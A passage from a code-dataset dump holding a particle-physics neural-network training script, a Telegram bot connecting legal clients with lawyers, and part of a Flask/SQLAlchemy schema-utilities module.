train[:,node][(y_train==i)],\n test[:,node][(y_test==i)]\n )\n \n ks[label] = (_p, _ks)\n\n h[label+'_test'] = Hist1D(test[:,node][(y_test==i)], bins=bins, weights=weight_test[(y_test==i)]).normalize()\n h[label+'_train'] = Hist1D(train[:,node][(y_train==i)], bins=bins, label=label+' (p=%.2f, KS=%.2f)'%(_p, _ks), weights=weight_train[(y_train==i)]).normalize()\n \n\n h[label+'_test'].plot(color=colors[i], histtype=\"step\", ls='--', linewidth=2)\n h[label+'_train'].plot(color=colors[i], histtype=\"step\", linewidth=2)\n\n if plot_dir:\n finalizePlotDir(plot_dir)\n fig.savefig(\"{}/score_node_{}.png\".format(plot_dir, node))\n fig.savefig(\"{}/score_node_{}.pdf\".format(plot_dir, node))\n \n return ks\n\n\ndef test_train_cat(test, train, y_test, y_train, labels=[], n_cat=5, plot_dir=None, weight_test=None, weight_train=None):\n ks = {}\n bins = [x-0.5 for x in range(n_cat+1)]\n \n fig, ax = plt.subplots(1,1,figsize=(10,10))\n \n h = {}\n for i, label in enumerate(labels):\n \n _ks, _p = scipy.stats.kstest(\n train.argmax(axis=1)[(y_train==i)],\n test.argmax(axis=1)[(y_test==i)]\n )\n\n ks[label] = (_p, _ks)\n \n h[label+'_test'] = Hist1D(test.argmax(axis=1)[(y_test==i)], bins=bins, weights=weight_test[(y_test==i)]).normalize()\n h[label+'_train'] = Hist1D(train.argmax(axis=1)[(y_train==i)], bins=bins, label=label+' (p=%.2f, KS=%.2f) train'%(_p, _ks), weights=weight_train[(y_train==i)]).normalize()\n\n h[label+'_test'].plot(color=colors[i], histtype=\"step\", ls='--', linewidth=2)\n h[label+'_train'].plot(color=colors[i], histtype=\"step\", linewidth=2)\n \n ax.set_ylabel('a.u.')\n ax.set_xlabel('category')\n\n ax.set_ylim(0,1/n_cat*5)\n\n if plot_dir:\n finalizePlotDir(plot_dir)\n fig.savefig(\"{}/categories.png\".format(plot_dir))\n fig.savefig(\"{}/categories.pdf\".format(plot_dir))\n\n return ks\n\ndef get_cat_plot(X, y, labels=[], n_cat=5, plot_dir=None, weight=None):\n ks = {}\n bins = [x-0.5 for x in range(n_cat+1)]\n \n fig, ax = plt.subplots(1,1,figsize=(10,10))\n \n h = {}\n for i, label in enumerate(labels):\n \n h[label+'_train'] = Hist1D(X.argmax(axis=1)[(y==i)], bins=bins, label=label, weights=weight[(y==i)])\n \n h[label+'_train'].plot(color=colors[i], histtype=\"step\", linewidth=2)\n \n ax.set_ylabel('a.u.')\n ax.set_xlabel('category')\n\n ax.set_ylim(0,200)\n\n if plot_dir:\n finalizePlotDir(plot_dir)\n fig.savefig(\"{}/abs_categories.png\".format(plot_dir))\n fig.savefig(\"{}/abs_categories.pdf\".format(plot_dir))\n\n\ndef get_ROC(test, train, y_test, y_train, node=0):\n\n y_test_binary = (y_test!=node)*0 + (y_test==node)*1\n\n fpr_test, tpr_test, thresholds_test = roc_curve( y_test_binary, test[:,node] )\n auc_val_test = auc(fpr_test, tpr_test)\n\n plt.plot( tpr_test, 1-fpr_test, 'b', label= 'AUC NN (test)=' + str(round(auc_val_test,4) ))\n\n y_train_binary = (y_train!=node)*0 + (y_train==node)*1\n \n fpr_train, tpr_train, thresholds_test = roc_curve( y_train_binary, train[:,node] )\n auc_val_train = auc(fpr_train, tpr_train)\n\n plt.plot( tpr_train, 1-fpr_train, 'r', label= 'AUC NN (train)=' + str(round(auc_val_train,4) ))\n\n plt.xlabel('$\\epsilon_{Sig}$', fontsize = 20) # 'False positive rate'\n plt.ylabel('$1-\\epsilon_{Back}$', fontsize = 20) # '1-True positive rate' \n plt.legend(loc ='lower left')\n\n\nif __name__ == '__main__':\n\n\n import argparse\n\n argParser = argparse.ArgumentParser(description = \"Argument parser\")\n argParser.add_argument('--load', action='store_true', default=None, help=\"Load weights?\")\n argParser.add_argument('--cat', action='store_true', default=None, help=\"Use categories?\")\n argParser.add_argument('--fit', action='store_true', default=None, help=\"Do combine fit?\")\n argParser.add_argument('--version', action='store', default='trilep_v1', help=\"Version number\")\n argParser.add_argument('--year', action='store', default='2018', help=\"Which year?\")\n args = argParser.parse_args()\n\n\n load_weights = args.load\n version = \"_\".join([args.year, args.version])\n is_cat = args.cat\n\n plot_dir = os.path.expandvars(\"/home/users/$USER/public_html/tW_scattering/ML/%s/\"%version)\n\n # Load the input data.\n # This data frame is produced with the SS_analysis processor:\n # ipython -i SS_analysis.py -- --dump\n #df = pd.read_hdf('/hadoop/cms/store/user/dspitzba/ML/multiclass_input_2018_trilep_v2.h5')\n df = pd.read_hdf('../processor/multiclass_input_%s_trilep_v2.h5'%args.year)\n\n variables = [\n ## best results with all variables, but should get pruned at some point...\n 'n_jet',\n ##'n_central',\n 'n_fwd',\n 'n_b',\n 'n_tau', ## important for ttZ\n 'n_ele',\n 'n_sfos',\n 'charge',\n #'n_track', ## not so important, and very bad data/MC agreement\n 'st',\n 'lt',\n ##'ht',\n 'met',\n 'mjj_max',\n 'delta_eta_jj',\n 'lead_lep_pt',\n 'lead_lep_eta',\n 'sublead_lep_pt',\n 'sublead_lep_eta',\n 'trail_lep_pt',\n 'trail_lep_eta',\n 'm3l',\n 'close_mass',\n 'far_mass',\n 'dilepton_mass',\n 'dilepton_pt',\n 'fwd_jet_pt',\n 'fwd_jet_p',\n 'fwd_jet_eta',\n 'lead_jet_pt',\n 'sublead_jet_pt',\n 'lead_jet_eta',\n 'sublead_jet_eta',\n 'lead_btag_pt',\n 'sublead_btag_pt',\n 'lead_btag_eta',\n 'sublead_btag_eta',\n 'min_bl_dR',\n 'min_mt_lep_met',\n ]\n\n baseline = (df['n_fwd']>=0)\n #baseline = (df['n_fwd']>0)\n\n df['label_orig'] = df['label']\n\n # Take input dataframe, rearrange the categories, calculate the correct weights, and relabel\n # Signal is easy. Just take events that are in the SS category: df['SS']==1, passing the baseline selection\n # Asigned label: 0\n #df_signal = df[((df['label']==0)&(df['trilep']==1)&baseline)] # This is the UL samples\n df_signal = df[((df['label']==100)&(df['trilep']==1)&baseline)] # This is the old, large stats sample\n df_signal['label'] = np.ones(len(df_signal))*0\n\n # Non-resonant backgrounds from the various processes that contribute.\n # Asigned label: 1\n df_prompt = df[(((df['label']==1)|(df['label']==3)|(df['label']==5))&(df['trilep'])&baseline)] # every prompt background except ttbar (which shouldn't have prompt anyway)\n df_prompt['label'] = np.ones(len(df_prompt))*1\n\n # Resonance lepton backgrounds from the various processes that contribute.\n # Asigned label: 2\n df_resonant = df[(((df['label']==2)|(df['label']==6))&(df['trilep'])&baseline)]\n df_resonant['label'] = np.ones(len(df_resonant))*2\n\n # Nonprompt leptons, taken from top quark process (input label 4).\n # We use the data driven background estimate, so we use events from the AR region, and adjust the weight accordingly\n # Asigned label: 3\n df_NP = df[((df['label']==4)&(df['AR']==1)&baseline)]\n df_NP['weight'] = df_NP['weight']*df_NP['weight_np']\n df_NP['label'] = np.ones(len(df_NP))*3\n\n # Resonance lepton backgrounds from the various processes that contribute.\n # Asigned label: 2\n df_XG = df[((df['label']==7)&(df['trilep'])&baseline)]\n df_XG['label'] = np.ones(len(df_XG))*4\n\n # These data frames are currently not used in training, but just for visualizations\n df_TTW = df[(((df['label']==1)|(df['label']==3)|(df['label']==5))&(df['trilep']==1)&baseline)] # assume that rares (4-top, VVV) is prompt, too\n df_TTW['label'] = np.ones(len(df_TTW))\n df_TTZ = df[((df['label']==2)&(df['trilep']==1)&baseline)]\n df_TTH = df[((df['label']==3)&(df['trilep']==1)&baseline)]\n\n print ()\n print (\"Yields after training preselection (baseline selection):\")\n df_list = [\\\n ('signal', df_signal),\n ('TTW/TTH', df_TTW),\n ('TTZ', df_TTZ),\n ('TTH', df_TTH),\n ('nonresonant', df_prompt),\n ('resonant', df_resonant),\n ('nonprompt', df_NP),\n ('XG', df_XG),\n ]\n\n print (\"{:30}{:>10}{:>10}\".format(\"Name\", \"Weighted\", \"Raw\"))\n for name, df in df_list:\n print (\"{:30}{:10.2f}{:10}\".format(name, sum(df['weight']), len(df)))\n\n print ()\n\n # Now, merge all the separate dataframes into one again\n df_in = pd.concat([df_signal, df_prompt, df_resonant, df_NP])\n labels = df_in['label'].values\n df_train, df_test, y_train_int, y_test_int = train_test_split(df_in, labels, train_size= int( 0.9*labels.shape[0] ), random_state=42 )\n\n X_train = df_train[variables].values\n X_test = df_test[variables].values\n\n y_train = get_one_hot(y_train_int.astype(int))\n y_test = get_one_hot(y_test_int.astype(int))\n \n\n input_dim = len(variables)\n out_dim = len(y_train[0])\n\n # Adjust the weights of every category so that they have equal importance\n # FIXME: We can try to increase e.g. the importance of prompt or lost lepton backgrounds vs others by multiplying\n # their weight by a constant factor. get_class_weight is imported from ML.multiclassifier_tools\n class_weight = get_class_weight(df_train, dim=out_dim)\n\n '''\n # Can't use pipelines, unfortunately\n pipeline = Pipeline([\n ('scaler', RobustScaler()),\n ('NN', baseline_model()),\n ])\n '''\n\n if not load_weights:\n\n epochs = 100 # 50 -> 200\n batch_size = 5120\n validation_split = 0.2\n\n scaler = RobustScaler()\n X_train_scaled = scaler.fit_transform(X_train)\n params = scaler.get_params()\n\n model = baseline_model(input_dim, out_dim)\n\n history = model.fit(\n X_train_scaled,\n y_train,\n epochs = epochs,\n batch_size = batch_size,\n verbose = 0,\n class_weight = class_weight,\n sample_weight = df_train['weight'].values,\n )\n\n store_model(model, scaler, version=version)\n\n else:\n #model, scaler = load_model(version=version)\n model, scaler = load_onnx_model(version=version)\n\n X_train_scaled = scaler.transform(X_train)\n print (\"Loaded weights.\")\n\n X_all = df_in[variables].values\n\n X_all_scaled = scaler.transform(X_all)\n X_test_scaled = scaler.transform(X_test)\n\n # Evaluate the model for the entire data frame (pred_all), just the training set (pred_train) or the test set (pred_test)\n if not load_weights:\n pred_all = model.predict( X_all_scaled )\n pred_train = model.predict( X_train_scaled )\n pred_test = model.predict( X_test_scaled )\n else:\n # always use ONNX for inference\n pred_all = predict_onnx(model, X_all_scaled )\n pred_train = predict_onnx(model, X_train_scaled )\n pred_test = predict_onnx(model, X_test_scaled )\n\n # We can now evaluate the performance\n df_in['score_topW'] = pred_all[:,0]\n df_in['score_prompt'] = pred_all[:,1]\n df_in['score_ll'] = pred_all[:,2]\n df_in['score_np'] = pred_all[:,3]\n #df_in['score_cf'] = pred_all[:,4]\n df_in['score_best'] = pred_all.argmax(axis=1)\n\n # For quantile transformation on the top-W node:\n from sklearn.preprocessing import QuantileTransformer\n qt = QuantileTransformer(n_quantiles=40, random_state=0)\n qt.fit(df_in[((df_in['label']==0)&(df_in['score_best']==0))]['score_topW'].values.reshape(-1, 1))\n \n store_transformer(qt, version=version)\n\n df_in['score_topW_transform'] = qt.transform(df_in['score_topW'].values.reshape(-1, 1))\n df_in['score_prompt_transform'] = qt.transform(df_in['score_prompt'].values.reshape(-1, 1))\n\n for i in range(3):\n print (\"Checking assignment for cat %s\"%i)\n for x in range(5):\n print (x, round(sum(df_in[((df_in['trilep']==1)&(df_in['label']==i)&(df_in['score_best']==x))]['weight'])/sum(df_in[((df_in['trilep']==1)&(df_in['label']==i))]['weight']), 3))\n\n print (\"NP assignment\")\n for x in range(5):\n print (x, round(sum(df_in[((df_in['AR']==1)&(df_in['label']==3)&(df_in['score_best']==x))]['weight'])/sum(df_in[((df_in['AR']==1)&(df_in['label']==3))]['weight']), 3))\n\n #print (\"XG assignment\")\n #for x in range(5):\n # print (x, round(sum(df_in[((df_in['trilep']==1)&(df_in['label']==4)&(df_in['score_best']==x))]['weight'])/sum(df_in[((df_in['trilep']==1)&(df_in['label']==4))]['weight']), 3))\n\n def get_bkg(x):\n bkg = sum(df_in[((df_in['trilep']==1)&(df_in['label']==1)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight']) + \\\n sum(df_in[((df_in['trilep']==1)&(df_in['label']==2)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight']) + \\\n sum(df_in[((df_in['AR']==1)&(df_in['label']==3)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight']) + \\\n sum(df_in[((df_in['trilep']==1)&(df_in['label']==4)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight'])\n return bkg\n\n def get_sig(x):\n return sum(df_in[((df_in['trilep']==1)&(df_in['label']==0)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight'])\n\n print (\"Signal yield in node 0: %.2f\"%get_sig(0))\n print (\"Baseline S/b: %.3f\"%(get_sig(0)/get_bkg(0)))\n\n # find the cut where there are only 9 bkg events left (arbitrary threshold)\n for i in range(0, 500, 1):\n bkg = get_bkg(i/500)\n if bkg < 9:\n break\n thresh = i/500\n \n print (\"S/B for bkg=9: %.3f\"%(get_sig(thresh)/get_bkg(thresh)))\n\n for i in range(0, 500, 1):\n sig = get_sig(i/500)\n if sig < 1:\n break\n thresh = i/500\n \n print (\"S/B for sig=1: %.3f\"%(get_sig(thresh)/get_bkg(thresh)))\n\n\n print (\"Checking for overtraining in max node asignment...\")\n\n colors = ['gray', 'blue', 'red', 'green', 'orange']\n hist_labels = ['top-W', 'nonresonant', 'resonant', 'NP']\n\n ks = test_train_cat(\n pred_test,\n pred_train,\n y_test_int,\n y_train_int,\n labels = hist_labels,\n n_cat = len(hist_labels),\n plot_dir = plot_dir,\n weight_test = df_test['weight'].values,\n weight_train = df_train['weight'].values,\n )\n\n for label in ks:\n if ks[label][0]<0.05:\n print (\"- !! Found small p-value for process %s: %.2f\"%(label, ks[label][0]))\n\n\n get_cat_plot(\n pred_all,\n df_in['label'].values,\n labels = hist_labels,\n n_cat = len(hist_labels),\n plot_dir = plot_dir,\n weight = df_in['weight'].values,\n )\n\n print (\"Checking for overtraining in the different nodes...\")\n\n bins = [x/20 for x in range(21)]\n\n for node in [0,1,2,3]:\n ks = test_train(\n pred_test,\n pred_train,\n y_test_int,\n y_train_int,\n labels=hist_labels,\n node=node,\n bins=bins,\n plot_dir=plot_dir,\n weight_test = df_test['weight'].values,\n weight_train = df_train['weight'].values,\n )\n for label in ks:\n if ks[label][0]<0.05:\n print (\"- !! Found small p-value for process %s in node %s: %.2f\"%(label, node, ks[label][0]))\n\n\n if not load_weights:\n dump_onnx_model(model, version=version)\n\n # Correlations\n from ML.multiclassifier_tools import get_correlation_matrix\n get_correlation_matrix(\n df_in[(df_in['label']==0)][(variables+['score_topW', 'score_prompt', 'score_ll', 'score_np'])], \n f_out=plot_dir+'/correlation.png'\n )\n \n # make this a function for two histograms with ratio, for a certain binning\n\n def shape_comparison(array1, array2, bins=20, weight1=[], weight2=[], normalize=True, labels=[\"first\", \"second\"], save=False):\n\n import mplhep as hep\n plt.style.use(hep.style.CMS)\n\n hist1 = Hist1D(array1, bins=np.arange(0,bins+1)/bins, weights=weight1)\n hist2 = Hist1D(array2, bins=np.arange(0,bins+1)/bins, weights=weight2)\n\n if normalize:\n hist1 = hist1.normalize()\n hist2 = hist1.normalize()\n\n ratio = hist1.divide(hist2)\n \n fig, (ax, rax) = plt.subplots(2,1,figsize=(10,10), gridspec_kw={\"height_ratios\": (3, 1), \"hspace\": 0.05}, sharex=True)\n\n hep.cms.label(\n \"Preliminary\",\n data=False,\n lumi=60.0,\n loc=0,\n ax=ax,\n )\n \n hep.histplot(\n [ hist1.counts, hist2.counts ],\n hist1.edges,\n w2=[ hist1.errors**2, hist2.errors**2 ],\n histtype=\"step\",\n stack=False,\n label=labels,\n ax=ax)\n\n hep.histplot(\n ratio.counts,\n ratio.edges,\n w2=ratio.errors,\n histtype=\"errorbar\",\n color='black',\n ax=rax)\n\n rax.set_ylim(0,1.99)\n rax.set_xlabel(r'$score$')\n rax.set_ylabel(r'Ratio')\n ax.set_ylabel(r'Events')\n \n #add_uncertainty(total_mc, rax, ratio=True)\n #add_uncertainty(total_mc, ax)\n \n ax.legend()\n \n plt.show()\n \n if save:\n fig.savefig(\"{}.png\".format(save))\n fig.savefig(\"{}.pdf\".format(save))\n\n shape_comparison(\n df_in[((df_in['label']==0)&(df_in['score_best']==0))]['score_topW_transform'].values,\n df_in[((df_in['label']==1)&(df_in['score_best']==0))]['score_topW_transform'].values,\n bins=8,\n weight1=df_in[((df_in['label']==0)&(df_in['score_best']==0))]['weight'].values,\n weight2=df_in[((df_in['label']==1)&(df_in['score_best']==0))]['weight'].values,\n normalize = False,\n save = \"{}/score_transformed\".format(plot_dir),\n )\n","sub_path":"ML/multiclassifier_trilep.py","file_name":"multiclassifier_trilep.py","file_ext":"py","file_size_in_byte":19408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"79600900","text":"import telebot as tb\r\nfrom telebot import apihelper\r\nimport re\r\nimport json\r\n\r\nip = '157.245.11.180'\r\nport = '3128'\r\n\r\napihelper.proxy = {\r\n 'https': 'https://{}:{}'.format(ip, port)\r\n}\r\n\r\n\r\ndef create_bot(api):\r\n bot = tb.TeleBot(api)\r\n\r\n @bot.message_handler(commands=['start'])\r\n def start(message):\r\n with open('lawyers.json', 'r') as f:\r\n data = json.load(f)\r\n f.close()\r\n\r\n if {\"user_id\": message.chat.id} in data:\r\n bot.send_message(message.chat.id, \"Ты уже в системе!\")\r\n return\r\n\r\n with open('lawyers.json', 'w') as f:\r\n data.append({'user_id': message.chat.id})\r\n json.dump(data, f)\r\n\r\n del data\r\n f.close()\r\n\r\n bot.send_message(message.chat.id, \"Добро пожаловать!\")\r\n\r\n @bot.message_handler(commands=['send'])\r\n def get_text(message):\r\n user_rep = tb.types.ForceReply()\r\n msg = bot.send_message(message.from_user.id, \"Текст заявки:\", reply_markup=user_rep)\r\n\r\n bot.register_next_step_handler(msg, send_text)\r\n\r\n def send_text(msg):\r\n keyboard = tb.types.InlineKeyboardMarkup()\r\n send_to_customer = tb.types.InlineKeyboardButton(text=\"Ответить\", callback_data=f\"send_to_customer:{msg.from_user.id}\")\r\n refuse_to_customer = tb.types.InlineKeyboardButton(text=\"Отказаться\", callback_data=f\"refuse_to_customer:{msg.from_user.id}\")\r\n\r\n keyboard.add(send_to_customer, refuse_to_customer)\r\n\r\n with open('lawyers.json', 'r') as f:\r\n users = json.load(f)\r\n f.close()\r\n for user in users:\r\n if user['user_id'] != msg.from_user.id:\r\n bot.send_message(user['user_id'], msg.text, reply_markup=keyboard)\r\n else:\r\n bot.send_message(msg.from_user.id, 'Вопрос был отправлен')\r\n\r\n del users\r\n\r\n @bot.callback_query_handler(func=lambda call: 'refuse_to_customer' in call.data)\r\n def handler_login(call):\r\n bot.delete_message(call.message.chat.id, call.message.message_id)\r\n\r\n @bot.callback_query_handler(func=lambda call: 'send_to_customer' in call.data)\r\n def handler_login(call):\r\n customers_text = call.message.text\r\n client_id = re.findall(r'\\d+', call.data)\r\n user_rep = tb.types.ForceReply()\r\n msg = bot.send_message(call.message.chat.id, \"Сделать предложение:\", reply_markup=user_rep)\r\n\r\n bot.register_next_step_handler(msg, send_request, client_id[-1], customers_text)\r\n\r\n def send_request(msg, client_id, customers_text):\r\n keyboard = tb.types.InlineKeyboardMarkup()\r\n accept_request = tb.types.InlineKeyboardButton(text=\"📝 Заполнить\",callback_data=f\"accept_request:{msg.from_user.id}\")\r\n\r\n keyboard.add(accept_request)\r\n\r\n bot.send_message(client_id, f'{customers_text}\\n\\n⬇️\\n--------------------\\nПредложение от юриста:\\n\\n'\r\n f'{msg.text}\\n\\n--------------------\\nЗаполните данные, чтобы с вами связались! '\r\n f'(Если вы допустили ошибку нажмите на кнопку, и заполните информацию вновь.)',\r\n reply_markup=keyboard, parse_mode='HTML')\r\n\r\n @bot.callback_query_handler(func=lambda call: 'accept_request' in call.data)\r\n def get_city(call):\r\n justiva_id = re.findall(r'\\d+', call.data)\r\n print(justiva_id)\r\n order = call.message.text\r\n order = order[0: order.find(\"\\n\\n\") + 1]\r\n data = list()\r\n\r\n msg = bot.send_message(call.message.chat.id, \"Введите свой 🏙️ город:\")\r\n\r\n bot.register_next_step_handler(msg, get_name, data, order, justiva_id)\r\n\r\n def get_name(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 👤 имя:\")\r\n\r\n bot.register_next_step_handler(msg, get_price, data, order, justiva_id)\r\n\r\n def get_price(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 💰 цена:\")\r\n\r\n bot.register_next_step_handler(msg, get_phone, data, order, justiva_id)\r\n\r\n def get_phone(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 📞 телефон:\")\r\n\r\n bot.register_next_step_handler(msg, get_telegram, data, order, justiva_id)\r\n\r\n def get_telegram(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 📘 телеграмм:\")\r\n\r\n bot.register_next_step_handler(msg, get_whatsup, data, order, justiva_id)\r\n\r\n def get_whatsup(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 📗 вацап:\")\r\n\r\n bot.register_next_step_handler(msg, get_all, data, order, justiva_id)\r\n\r\n def get_all(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n keyboard = tb.types.InlineKeyboardMarkup()\r\n send_to_customer = tb.types.InlineKeyboardButton(text=\"Отправить\",\r\n callback_data=f\"send_to_justiva:{justiva_id[0]}\")\r\n\r\n keyboard.add(send_to_customer)\r\n\r\n customer_info = f'{order}--------------------\\n' \\\r\n f'🏙️ Город: {data[0]}\\n👤 Имя: {data[1]}\\n💰 Цена: {data[2]}\\n📞 Телефон: {data[3]}\\n' \\\r\n f'📘 Телеграмм: {data[4]}\\n📗 Вацап: {data[5]}'\r\n\r\n bot.send_message(msg.from_user.id, customer_info, reply_markup=keyboard)\r\n\r\n @bot.callback_query_handler(func=lambda call: 'send_to_justiva' in call.data)\r\n def get_info_to_justiva(call):\r\n print(call.data)\r\n justiva_id = re.findall(r'\\d+', call.data)\r\n bot.send_message(justiva_id[0], call.message.text)\r\n bot.send_message(call.message.chat.id, 'Ваши данные отправлены юристу!')\r\n\r\n return bot\r\n\r\n\r\ndef main():\r\n api_token = \"TOKEN\"\r\n bot = create_bot(api_token)\r\n bot.polling(none_stop=True, interval=0)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"272058158","text":"\"\"\" Model and schema related utilities. \"\"\"\nimport functools, operator, json, re\nfrom flask import request, g\nfrom marshmallow import Schema, fields\nfrom marshmallow.schema import SchemaMeta\nfrom sqlalchemy import and_, or_, not_\nfrom sqlalchemy.orm.query import Query\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy.sql.operators import ColumnOperators\n\nfrom app import db\nfrom app.util.core import APIError, camel_to_snake, map_error, getattr_keypath, setitem_keypath\n\nclass Nested(fields.Nested):\n \"\"\" Modified Marshmallow Nested field with flexible nested serialization and deserialization. \"\"\"\n def __init__(self, *args, **kwargs):\n # Initialize base class\n super(Nested, self).__init__(*args, **kwargs)\n # Model\n model = self.metadata.get(\"model\")\n if not model:\n raise AttributeError(\"Model parameter must be defined for nested schema field.\")\n # Primary key\n model_mirror = self.model_mirror = inspect(model)\n self.primary_key = getattr(model, model_mirror.primary_key[0].name)\n def _serialize(self, value, attr, obj):\n \"\"\"\n Serialized nested data.\n\n Args:\n value: The value to be serialized.\n attr: The attribute or key on the object to be serialized.\n obj: The object the value was pulled from.\n Returns:\n Serialized value.\n \"\"\"\n many = self.metadata.get(\"many\", False)\n model = self.metadata[\"model\"]\n nested_fields_stack = self.context.get(\"__nested_stack\", None)\n nested_fields = nested_fields_stack[-1] if nested_fields_stack else None\n # No value\n if value==None:\n return value\n # Queryset type check\n if many and not isinstance(value, Query):\n raise TypeError(\"Only queryset can be serialized when many is True.\")\n # Nested field serialization restriction\n if not nested_fields or attr not in nested_fields:\n if many:\n return [item[0] for item in value.with_entities(self.primary_key).all()]\n else:\n return getattr(value, self.primary_key.name)\n # Transfrom query set to iterable data if many is true\n if many and isinstance(value, Query):\n value = value.all()\n # Nested nested fields\n nested_nested_fields = nested_fields[attr]\n if nested_nested_fields:\n nested_fields_stack.append(nested_nested_fields)\n result = super(Nested, self)._serialize(value, attr, obj)\n nested_fields_stack.pop()\n else:\n result = super(Nested, self)._serialize(value, attr, obj)\n # Call base class serialize method\n return result\n def _deserialize(self, value, attr, data):\n \"\"\"\n Find nested data by primary key as deserialize result.\n\n Args:\n value: The value to be deserialized.\n attr: The attribute or key in \"data\" to be deserialized.\n obj: The raw input data.\n Returns:\n Deserialized value.\n \"\"\"\n import sys\n print(value, file=sys.stderr)\n many = self.metadata.get(\"many\", False)\n model = self.metadata[\"model\"]\n # Many\n if many:\n raise NotImplementedError()\n else:\n return value if isinstance(value, model) else get_pk(model, value)\n\ndef load_data(schema, data, load_args={}, **kwargs):\n \"\"\"\n Load data through schema.\n\n Args:\n schema: Schema instance or class used for serialization.\n obj: Data to be deserialized.\n load_args: Arguments for \"load\" method in serialization process.\n Only valid if schema is a class derived from \"Schema\".\n kwargs: Arguments for class constructor if schema is class, or for \"load\" method if schema is instance.\n \"\"\"\n # Schema instance\n if isinstance(schema, Schema):\n load_args = kwargs\n # Schema class\n elif issubclass(schema, Schema):\n schema = schema(**kwargs)\n else:\n raise TypeError(\"'schema' must be a derived class or a instance of Schema class.\")\n # Parse with error handling\n obj, error = schema.load(data, **load_args)\n if error:\n raise APIError(400, \"arg_fmt\", errors=error)\n return obj\n\ndef dump_data(schema, obj, nested=(), nested_user=False, dump_args={}, **kwargs):\n \"\"\"\n Dump data through schema.\n\n Args:\n schema: Schema instance or class used for serialization.\n obj: Model instance to be serialized.\n nested: Nested fields to be serialized.\n nested_user: Serialize nested fields designated by user request.\n dump_args: Arguments for \"dump\" method in serialization process.\n Only valid if schema is a class derived from \"Schema\".\n kwargs: Arguments for class constructor if schema is class, or for \"dump\" method if schema is instance.\n \"\"\"\n # Nested serialization field list\n nested = list(nested)\n if nested_user:\n nested += g.json_params.get(\"with\", [])\n # Schema instance\n if isinstance(schema, Schema):\n load_args = kwargs\n # Schema class\n elif issubclass(schema, Schema):\n schema = schema(**kwargs)\n else:\n raise TypeError(\"'schema' must be a derived class or a instance of Schema class.\")\n # Nested fields\n nested_fields = {}\n for keypath in nested:\n setitem_keypath(nested_fields, keypath, {}, True)\n # Dump with nested schema support\n schema.context[\"__nested_stack\"] = [nested_fields]\n result = schema.dump(obj, **dump_args)[0]\n schema.context[\"__nested_stack\"] = None\n return result\n\ndef get_pk(model, pk, allow_null=False, error=APIError(404, \"not_found\")):\n \"\"\"\n Get element by primary key.\n\n Args:\n model: Model class to operate.\n pk: Primary key of the element.\n allow_null: Return null when nothing is found. Will throw APIError otherwise.\n error: Custom error instance to be thrown when nothing is found.\n Returns:\n Model instance.\n Raises:\n APIError: When nothing is found and allow_null is set to false.\n \"\"\"\n result = model.query.get(pk)\n if not (allow_null or result):\n raise error\n return result\n\ndef get_by(model, allow_null=False, error=APIError(404, \"not_found\"), **kwargs):\n \"\"\"\n Get element by given condition.\n\n Args:\n model: Model class to operate.\n allow_null: Return null when nothing is found. Will throw APIError otherwise.\n error: Custom error instance to be thrown when nothing is found.\n kwargs: Keyword arguments to be passed to filter_by function.\n Returns:\n Model instance.\n Raises:\n APIError: When nothing is found and allow_null is set to false.\n \"\"\"\n result = model.query.filter_by(**kwargs).first()\n if not (allow_null or result):\n raise error\n return result\n\ndef foreign_key(target_model, backref_name):\n \"\"\"\n Define a foreign key relationship.\n\n Args:\n target_model: Name of the target model.\n backref_name: Back reference name on the target model.\n Returns:\n A tuple with a foreign key relationship object and a foreign key ID field.\n \"\"\"\n return (\n db.relationship(target_model, backref=db.backref(backref_name, lazy=\"dynamic\")),\n db.Column(db.Integer(), db.ForeignKey(\"%s.id\" % camel_to_snake(target_model)))\n )\n\ndef many_to_many(source_model, target_model, backref_name):\n \"\"\"\n Define a many-to-many relationship.\n\n Args:\n source_model: Name of the source model.\n target_model: Name of the target model.\n backref_name: Back reference name on the target model.\n Returns:\n A SQLAlchemy many-to-many relationship object.\n \"\"\"\n source_model_snake = camel_to_snake(source_model)\n target_model_snake = camel_to_snake(target_model)\n # Helper table\n helper_table = db.Table(\n \"m2m_%s_%s_%s\" % (source_model, target_model, backref_name),\n db.Column(\"%s_id\" % source_model_snake, db.Integer, db.ForeignKey(\"%s.id\" % source_model_snake)),\n db.Column(\"%s_id\" % target_model_snake, db.Integer, db.ForeignKey(\"%s.id\" % target_model_snake))\n )\n # Many-to-many relationship\n return db.relationship(\n target_model,\n secondary=helper_table,\n backref=db.backref(backref_name, lazy=\"dynamic\"),\n lazy=\"dynamic\"\n )\n\ndef parse_param(schema=None, schema_class=None, target=\"params\", init_args={}, load_args={}):\n \"\"\"\n Decorator for checking and parsing request parameters.\n\n Args:\n schema: Schema instances to be used for deserializing.\n schema_class: Schema class to be used for deserializing.\n Can be a class derived from Schema class or a dictionary of class members.\n In the latter class, a class derived from Schema class will be created from given dictionary.\n target: Name of the attribute to be set on request data object (g).\n init_args: Parameters used to initialize a schema instance.\n Only valid when a schema class is passed in.\n load_args: Parameters used to deserialize requests.\n Returns:\n A decorator which does request parameters checking and deserializing before calling decorated view.\n \"\"\"\n # Build schema from schema class\n if schema==None:\n # Build schema class from dictionary\n if isinstance(schema_class, dict):\n schema_class = SchemaMeta(\"ParamSchema\", (Schema,), schema_class)\n # Illegal schema class type\n elif not issubclass(schema_class, Schema):\n raise TypeError(\"schema_class must be a dictionary or derived from Schema class.\")\n schema = 